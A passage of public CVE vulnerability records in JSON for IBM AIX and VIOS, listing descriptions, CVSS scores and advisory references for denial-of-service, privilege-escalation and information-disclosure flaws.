"psirt@us.ibm.com", "ID": "CVE-2012-4817", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The NFSv4 client implementation in IBM AIX 5.3, 6.1, and 7.1, and VIOS before 2.2.1.4-FP-25 SP-02, does not properly handle GID values, which allows remote attackers to cause a denial of service via unspecified vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "1027531", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id?1027531" }, { "name": "IV12169", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV12169" }, { "name": "85427", "refsource": "OSVDB", "url": "http://osvdb.org/85427" }, { "name": "50619", "refsource": "SECUNIA", "url": "http://secunia.com/advisories/50619" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/nfsv4_advisory1.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/nfsv4_advisory1.asc" }, { "name": "IV17855", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV17855" }, { "name": "IV10327", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV10327" }, { "name": "IV26436", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV26436" }, { "name": "55546", "refsource": "BID", "url": "http://www.securityfocus.com/bid/55546" }, { "name": "IV11629", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV11629" }, { "name": "aix-nfsv4-gid-dos(78431)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/78431" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2012-4817", "datePublished": "2012-09-14T23:00:00", "dateReserved": "2012-09-06T00:00:00", "dateUpdated": "2024-08-06T20:50:16.877Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2016-6079
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/94090 | vdb-entry, x_refsource_BID | |
http://www.securitytracker.com/id/1037256 | vdb-entry, x_refsource_SECTRACK | |
http://aix.software.ibm.com/aix/efixes/security/lquerylv_advisory.asc | x_refsource_CONFIRM | |
https://www.exploit-db.com/exploits/40710/ | exploit, x_refsource_EXPLOIT-DB |
▼ | Vendor | Product |
---|---|---|
IBM Corporation | AIX |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T01:22:19.707Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "94090", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/94090" }, { "name": "1037256", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1037256" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/lquerylv_advisory.asc" }, { "name": "40710", "tags": [ "exploit", "x_refsource_EXPLOIT-DB", "x_transferred" ], "url": "https://www.exploit-db.com/exploits/40710/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "AIX", "vendor": "IBM Corporation", "versions": [ { "status": "affected", "version": "5.3" }, { "status": "affected", "version": "6.1" }, { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" } ] } ], "datePublic": "2016-11-07T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 5.3, 6.1, 7.1, and 7.2 contains an unspecified vulnerability that would allow a locally authenticated user to obtain root level privileges. IBM APARs: IV88658, IV87981, IV88419, IV87640, IV88053." } ], "problemTypes": [ { "descriptions": [ { "description": "Gain Privileges", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-09-02T09:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "94090", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/94090" }, { "name": "1037256", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1037256" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/lquerylv_advisory.asc" }, { "name": "40710", "tags": [ "exploit", "x_refsource_EXPLOIT-DB" ], "url": "https://www.exploit-db.com/exploits/40710/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "ID": "CVE-2016-6079", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "AIX", "version": { "version_data": [ { "version_value": "5.3" }, { "version_value": "6.1" }, { "version_value": "7.1" }, { "version_value": "7.2" } ] } } ] }, "vendor_name": "IBM Corporation" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 5.3, 6.1, 7.1, and 7.2 contains an unspecified vulnerability that would allow a locally authenticated user to obtain root level privileges. IBM APARs: IV88658, IV87981, IV88419, IV87640, IV88053." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Gain Privileges" } ] } ] }, "references": { "reference_data": [ { "name": "94090", "refsource": "BID", "url": "http://www.securityfocus.com/bid/94090" }, { "name": "1037256", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id/1037256" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/lquerylv_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/lquerylv_advisory.asc" }, { "name": "40710", "refsource": "EXPLOIT-DB", "url": "https://www.exploit-db.com/exploits/40710/" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2016-6079", "datePublished": "2017-02-15T19:00:00", "dateReserved": "2016-06-29T00:00:00", "dateUpdated": "2024-08-06T01:22:19.707Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-43381
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6851443 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/238639 | vdb-entry |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T13:32:58.834Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6851443" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/238639" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1, 7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\n\n\u003cspan style=\"background-color: rgb(204, 217, 226);\"\u003eIBM AIX 7.1, 7.2, 7.3, and VIOS 3.1could allow a non-privileged local user to exploit a vulnerability in the AIX SMB client to cause a denial of service. IBM X-Force ID: 238639.\u003c/span\u003e\n\n" } ], "value": "\nIBM AIX 7.1, 7.2, 7.3, and VIOS 3.1could allow a non-privileged local user to exploit a vulnerability in the AIX SMB client to cause a denial of service. IBM X-Force ID: 238639.\n\n" } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-399", "description": "CWE-399 Resource Management Errors", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-23T18:19:31.382Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/6851443" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/238639" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX denial of service ", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2022-43381", "datePublished": "2022-12-23T18:19:31.382Z", "dateReserved": "2022-10-17T19:55:40.484Z", "dateUpdated": "2024-08-03T13:32:58.834Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2014-0930
Vulnerability from cvelistv5
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T09:34:40.459Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "IV59675", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV59675" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-0930/" }, { "name": "IV59045", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV59045" }, { "name": "20140506 CVE-2014-0930 - Kernel Memory Leak And Denial Of Service Condition in IBM AIX", "tags": [ "mailing-list", "x_refsource_BUGTRAQ", "x_transferred" ], "url": "http://archives.neohapsis.com/archives/bugtraq/2014-05/0031.html" }, { "name": "IV58766", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV58766" }, { "name": "IV58888", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV58888" }, { "name": "IV58948", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV58948" }, { "name": "ibm-aix-cve20140930-dos(92262)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/92262" }, { "name": "IV58861", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV58861" }, { "name": "IV58840", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV58840" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/ptrace_advisory.asc" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2014-05-02T00:00:00", "descriptions": [ { "lang": "en", "value": "The ptrace system call in IBM AIX 5.3, 6.1, and 7.1, and VIOS 2.2.x, allows local users to cause a denial of service (system crash) or obtain sensitive information from kernel memory via a crafted PT_LDINFO operation." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-08-28T12:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "IV59675", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV59675" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-0930/" }, { "name": "IV59045", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV59045" }, { "name": "20140506 CVE-2014-0930 - Kernel Memory Leak And Denial Of Service Condition in IBM AIX", "tags": [ "mailing-list", "x_refsource_BUGTRAQ" ], "url": "http://archives.neohapsis.com/archives/bugtraq/2014-05/0031.html" }, { "name": "IV58766", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV58766" }, { "name": "IV58888", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV58888" }, { "name": "IV58948", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV58948" }, { "name": "ibm-aix-cve20140930-dos(92262)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/92262" }, { "name": "IV58861", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV58861" }, { "name": "IV58840", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV58840" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/ptrace_advisory.asc" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "ID": "CVE-2014-0930", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The ptrace system call in IBM AIX 5.3, 6.1, and 7.1, and VIOS 2.2.x, allows local users to cause a denial of service (system crash) or obtain sensitive information from kernel memory via a crafted PT_LDINFO operation." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "IV59675", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV59675" }, { "name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-0930/", "refsource": "MISC", "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-0930/" }, { "name": "IV59045", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV59045" }, { "name": "20140506 CVE-2014-0930 - Kernel Memory Leak And Denial Of Service Condition in IBM AIX", "refsource": "BUGTRAQ", "url": "http://archives.neohapsis.com/archives/bugtraq/2014-05/0031.html" }, { "name": "IV58766", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV58766" }, { "name": "IV58888", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV58888" }, { "name": "IV58948", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV58948" }, { "name": "ibm-aix-cve20140930-dos(92262)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/92262" }, { "name": "IV58861", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV58861" }, { "name": "IV58840", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV58840" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/ptrace_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/ptrace_advisory.asc" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2014-0930", "datePublished": "2014-05-08T10:00:00", "dateReserved": "2014-01-06T00:00:00", "dateUpdated": "2024-08-06T09:34:40.459Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2016-0266
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/92150 | vdb-entry, x_refsource_BID | |
http://www-01.ibm.com/support/docview.wss?uid=swg1IV86117 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.securitytracker.com/id/1036467 | vdb-entry, x_refsource_SECTRACK | |
http://www-01.ibm.com/support/docview.wss?uid=swg1IV86132 | vendor-advisory, x_refsource_AIXAPAR | |
http://www-01.ibm.com/support/docview.wss?uid=swg1IV86118 | vendor-advisory, x_refsource_AIXAPAR | |
http://www-01.ibm.com/support/docview.wss?uid=swg1IV86116 | vendor-advisory, x_refsource_AIXAPAR | |
http://www-01.ibm.com/support/docview.wss?uid=swg1IV86119 | vendor-advisory, x_refsource_AIXAPAR | |
https://aix.software.ibm.com/aix/efixes/security/nettcp_advisory2.asc | x_refsource_CONFIRM | |
http://www-01.ibm.com/support/docview.wss?uid=swg1IV86120 | vendor-advisory, x_refsource_AIXAPAR |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T22:15:23.198Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "92150", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/92150" }, { "name": "IV86117", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV86117" }, { "name": "1036467", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1036467" }, { "name": "IV86132", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV86132" }, { "name": "IV86118", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV86118" }, { "name": "IV86116", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV86116" }, { "name": "IV86119", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV86119" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://aix.software.ibm.com/aix/efixes/security/nettcp_advisory2.asc" }, { "name": "IV86120", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV86120" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-07-26T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 5.3, 6.1, 7.1, and 7.2 and VIOS 2.2.x do not default to the latest TLS version, which makes it easier for man-in-the-middle attackers to obtain sensitive information via unspecified vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-08-31T09:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "92150", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/92150" }, { "name": "IV86117", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV86117" }, { "name": "1036467", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1036467" }, { "name": "IV86132", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV86132" }, { "name": "IV86118", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV86118" }, { "name": "IV86116", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV86116" }, { "name": "IV86119", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV86119" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://aix.software.ibm.com/aix/efixes/security/nettcp_advisory2.asc" }, { "name": "IV86120", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV86120" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "ID": "CVE-2016-0266", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 5.3, 6.1, 7.1, and 7.2 and VIOS 2.2.x do not default to the latest TLS version, which makes it easier for man-in-the-middle attackers to obtain sensitive information via unspecified vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "92150", "refsource": "BID", "url": "http://www.securityfocus.com/bid/92150" }, { "name": "IV86117", "refsource": "AIXAPAR", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV86117" }, { "name": "1036467", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id/1036467" }, { "name": "IV86132", "refsource": "AIXAPAR", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV86132" }, { "name": "IV86118", "refsource": "AIXAPAR", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV86118" }, { "name": "IV86116", "refsource": "AIXAPAR", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV86116" }, { "name": "IV86119", "refsource": "AIXAPAR", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV86119" }, { "name": "https://aix.software.ibm.com/aix/efixes/security/nettcp_advisory2.asc", "refsource": "CONFIRM", "url": "https://aix.software.ibm.com/aix/efixes/security/nettcp_advisory2.asc" }, { "name": "IV86120", "refsource": "AIXAPAR", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IV86120" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2016-0266", "datePublished": "2016-08-08T01:00:00", "dateReserved": "2015-12-08T00:00:00", "dateUpdated": "2024-08-05T22:15:23.198Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-45172
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/7099314 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/267970 | vdb-entry |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:14:19.728Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/7099314" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/267970" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in AIX windows to cause a denial of service. IBM X-Force ID: 267970." } ], "value": "IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in AIX windows to cause a denial of service. IBM X-Force ID: 267970." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-20", "description": "CWE-20 Improper Input Validation", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-12-19T22:12:21.055Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/7099314" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/267970" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX denial of service", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2023-45172", "datePublished": "2023-12-19T22:12:21.055Z", "dateReserved": "2023-10-05T01:38:44.722Z", "dateUpdated": "2024-08-02T20:14:19.728Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-40371
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/7028420 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/263476 | vdb-entry |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T18:31:53.641Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/7028420" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/263476" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-40371", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-10-01T14:54:07.115256Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-10-01T16:09:30.283Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM AIX 7.2, 7.3, VIOS 3.1\u0027s OpenSSH implementation could allow a non-privileged local user to access files outside of those allowed due to improper access controls. IBM X-Force ID: 263476." } ], "value": "IBM AIX 7.2, 7.3, VIOS 3.1\u0027s OpenSSH implementation could allow a non-privileged local user to access files outside of those allowed due to improper access controls. IBM X-Force ID: 263476." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-327", "description": "CWE-327 Use of a Broken or Risky Cryptographic Algorithm", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-09-20T18:12:07.581Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/7028420" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/263476" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX information disclosure", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2023-40371", "datePublished": "2023-08-24T13:00:56.021Z", "dateReserved": "2023-08-14T20:12:04.115Z", "dateUpdated": "2024-10-01T16:09:30.283Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2010-0961
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://aix.software.ibm.com/aix/efixes/security/qoslist_advisory.asc | x_refsource_CONFIRM | |
http://securitytracker.com/id?1023694 | vdb-entry, x_refsource_SECTRACK | |
